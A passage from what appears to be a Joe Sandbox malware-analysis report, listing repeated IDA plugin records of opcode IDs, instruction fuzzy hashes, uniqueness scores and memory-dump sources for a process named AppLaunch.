                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: ce867bfa4589520ddfd5244970c22983bcf8d0c6125b560a566479b8cc4a98e9
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8716525f0ae2e1a0e9ab82cbae4205b8f3e5327e2a578aa77e62902520ccc37c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce867bfa4589520ddfd5244970c22983bcf8d0c6125b560a566479b8cc4a98e9
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C221F6307092809FCB059B69D8548BEBBF6EF8A314B1591AAE506CB7A2D7349C14C792
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 86f658f1ab7bdabc358880595990fcf3a00efba5ff6cfa6cdbdb05b8de2470f8
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9b447776947fca697c6b96ba181028fcd8538ea44380cf23b95ed9c23bb59f84
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86f658f1ab7bdabc358880595990fcf3a00efba5ff6cfa6cdbdb05b8de2470f8
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03318932D0074B8ADB10EFB9D8002D9B371BF99320F24872AE55977600EB70B6E0CB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 722db1038e7cfc69158cdb1f083172cfaf9bd46ac44371afefccafd4ce3aaafc
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 60e5e6b418f4c9c877890d7e62643202e948cc416dc44992665b4fd14fd4b772
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 722db1038e7cfc69158cdb1f083172cfaf9bd46ac44371afefccafd4ce3aaafc
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42312A34A402158FD758DF69C4A8BAA7BF2FF8D314F2444A8E5069B3A0DB359C41CBA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f9151472cd89f0c1480ebaa222ae37fabbfd6350e95087943c952ab3f1fb6be5
                                                                                                                                                                                                                                                                                                                  • Instruction ID: f43d63f22bd90ffea49439f45c0a65b7984477b7c90da5705b75ca8acdded66b
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9151472cd89f0c1480ebaa222ae37fabbfd6350e95087943c952ab3f1fb6be5
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69219170B002168BEB64EF7A841436FBFB6AF84210F148169D916DB284EB30C851C7A1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 024dd35f54e7c939fde2e393db1d0f347ebad1aa9ad676f978170c3e2ee47391
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 906106b6328690826468ff54e7060ef2d197ce74fa5de96465328df81624c82d
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 024dd35f54e7c939fde2e393db1d0f347ebad1aa9ad676f978170c3e2ee47391
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8315C34B00209DFCB04DF64D9948ADBBB6FF89314B108199E9059B365D735ED06CFA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: a253f4d53d02441a560ecf0be1269bea4556384e05a947fbc7dcaa716c9c4600
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 816bfce32acff387934f829f65d89a1b2a93d3b8bb6340f913b5a94bbb6aee55
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a253f4d53d02441a560ecf0be1269bea4556384e05a947fbc7dcaa716c9c4600
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5131A970B006168FDB04EB6DE85496E77B6EFC9308B504269E40A9B761EB34ED50CB91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 95314d157815d7cc5e8b0995170ad822b75f32e2ff8ca040104c82f205f8ef1a
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 615e4e4312550191b2e24c4f0d3d7af1dc7ed0e069ae53a4fff06da2c319eb3b
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95314d157815d7cc5e8b0995170ad822b75f32e2ff8ca040104c82f205f8ef1a
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5531E170B003568FDB01EB69D85056E7BB6EFC9308B504269E8069B751EB34EE50CBD1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 210f46557b5477fa417197e9ffc0b09534b1d18361ca903d2ea37c4d511e97cb
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0073e0d5ea42c3f20a494227c21f5ba6821a9e1462f1d5ca73dbea986bfbba66
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 210f46557b5477fa417197e9ffc0b09534b1d18361ca903d2ea37c4d511e97cb
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF310635900219EFEF01DFE4E849AACBFB2FF49304F548454EA01A7221EB3A6955DF91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1ceff64e7893bd35c8df0273fff5708727e778b39c4e3d432fd23da003e855f2
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 69467230422171fe7ced1d3d5af5457887bc0b8d396ca02eba9517ab6c9a27e4
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ceff64e7893bd35c8df0273fff5708727e778b39c4e3d432fd23da003e855f2
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56314534A44204CFDB50DFA8C584A99BBF5EF89350F6980AAE505EB762E731ED41CB60
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 36ec6eb8ac46aa5cad3b4f77c335edb8975e595716e0128a6d40e6a6fee37406
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b43452a44e308888bd390ae5e9ceeb3507ac14869f57362a26c444e1d48bc3f
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36ec6eb8ac46aa5cad3b4f77c335edb8975e595716e0128a6d40e6a6fee37406
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22317870B403089FEB04EFB9D855A6DBBB1EF86200F5480A9E805DB3A1EB349D15CB50
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 68cb667cd9a1c0a79a5a088c0ae893f9088acab49ef78bf8d246127438d1d5b4
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ddd45c4ec5d1f1fd65dd5c5ebc439167fa8377b91d93526d3a7ad3748b6d2706
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68cb667cd9a1c0a79a5a088c0ae893f9088acab49ef78bf8d246127438d1d5b4
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61314330A44204CFDB50DFA8C984A9EBBF6EF89711F1580AAE505EB761E731ED41CB61
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8e8d0506e7eaac3aee71b0b9474fe6a099332f538c30e74e2b322e82a9a11d5b
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4c5e368eb76d1312dcec22f654beee0cc02756634f83a6938678305fe9e8039a
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e8d0506e7eaac3aee71b0b9474fe6a099332f538c30e74e2b322e82a9a11d5b
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8231A231E0061BCBDB15AFB9D4102AEB7B5FF94344F208629C95AA7740DB35A941CBD1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 86f8fa4febea7a178d93da0032552122fe9263cdcea58040bdf428a7e57e4b3c
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 23091586daa4800877bf33bbe335d1b04e8d354422cbc2374351948b37ae18e6
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86f8fa4febea7a178d93da0032552122fe9263cdcea58040bdf428a7e57e4b3c
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B2182306003419FDB15DF75E8949EABFF2EFC63147019979D586CB222EB74A84ACB90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2c3afc24b3efab06c752db53a9d234b86682555522b658646586cc2585481955
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 58b49316f13e136d576c4d8296258a4183881d86be87349f215cc3fe99478062
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c3afc24b3efab06c752db53a9d234b86682555522b658646586cc2585481955
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C421FF31B093819FD71ADF78D8248697FB6EF8621430580EEE446CB272DB358D55CBA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0071c10677eb86240d49acf756f7ad2cf22242ca04c227a399a622c944414e86
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7f327973d0215f728407cb66e24065f3702c324c45ce803b40620bbd843dbc94
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0071c10677eb86240d49acf756f7ad2cf22242ca04c227a399a622c944414e86
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2621B630B8D2E2CFD7A52B39A46833A3FB7DB51745B2044ADD483CA691DA2D8805C7D7
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: ef298db7bd276146f2af7e1bfd6c5e87e69f419821906e1283333959bed88048
                                                                                                                                                                                                                                                                                                                  • Instruction ID: f3e9a5db2256e6a836f0aa3e121a5044228c264cc9a43c53d8d977def65b0d56
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef298db7bd276146f2af7e1bfd6c5e87e69f419821906e1283333959bed88048
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E316D34B0020ADFCB04DF65D5848ADBBB6FF89314B108159D9059B365EB31EC06CFA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2625220282.0000000004EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EED000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4eed000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 13e0cb14825fedea03d4ed2cbbc68c6afdf4bf9736d6631e4443126d8425f8e3
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 36cf846d6eea1cbfa33ed2d71ef637dab5854fbf75088866894888a5c77c1f57
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13e0cb14825fedea03d4ed2cbbc68c6afdf4bf9736d6631e4443126d8425f8e3
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B210671A04201DFDB05DF54D9C0F26BF65FB84328F248569D9090B256C336E459CAA2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2625220282.0000000004EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EED000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_4eed000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 99b7a1ed97155eafa7dd7a4b28a1b280d1a36ef314c35d0756fc9e5c83451621
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 072ead33ff56be0b28301654b2001a1e74319641bde4e05fd628249cb3861ae0
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99b7a1ed97155eafa7dd7a4b28a1b280d1a36ef314c35d0756fc9e5c83451621
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A2103B2600205EFDB05DF15D9C0F36BF65FB94328F20C569E9090B246C336F856CAA2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2646148974.0000000009120000.00000040.00000800.00020000.00000000.sdmp, Offset: 09120000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9120000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d4133589a1b097547fe9b890b9ae6276e23c132514f128f61e2f85382313ce7e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8883f8e13473623bdec3c275f0a50ee01d863e9c6377aaf1470d6e74de11606c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4133589a1b097547fe9b890b9ae6276e23c132514f128f61e2f85382313ce7e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F213A743002018FD710EB6DD890A6A77E6EFDC308755896DE689CF366EB70EC028B91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626099935.00000000068AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 068AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_68ad000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: bd4c07ffdce8d68ae11330fc581110c45660f22bcb75d1ed0932300718e58399
                                                                                                                                                                                                                                                                                                                  • Instruction ID: eb6b667000da1517dd4f2bd82bdefec463fa902fdd4785e5393c8f18994e5851
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd4c07ffdce8d68ae11330fc581110c45660f22bcb75d1ed0932300718e58399
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A321C1B5904304EFEB44DF24D580B29BBA5FF88218F24C569DE09CA752C77AD446CAA1
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626099935.00000000068AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 068AD000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_68ad000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: af7356f551f5224b65213ed48c37fe0e134f2a605df19cba4f6099da0405039d
                                                                                                                                                                                                                                                                                                                  • Instruction ID: e8db3e3edf12d63e0536d7113f78e16efc44c754d1dd024e2e56602247ff8b15
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af7356f551f5224b65213ed48c37fe0e134f2a605df19cba4f6099da0405039d
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 462104B1505304EFEB60DF14D980B2ABB65FF84324F20C569DD09CB646C37AE446CAA2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2626382612.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_6a20000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3b044356e44e32930d974b5f70b8609ac53ce8027a57cffe10631ff26d6dbc03
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9b469e719e08a0ce25b941f1eb18729432d06c912cacde85145aba5a6c798fe5
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b044356e44e32930d974b5f70b8609ac53ce8027a57cffe10631ff26d6dbc03
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C821EB3010D3D58FE321A779E864B667FF9DF47314F2508AED489CB692C6796808C7A2
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2653231216.0000000009DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DA0000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_9da0000_AppLaunch.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                  • Opcode ID: e1d827edb00807e39a6b58829d2a084f2a9e3cc5487f7e655216d2a94690b72f
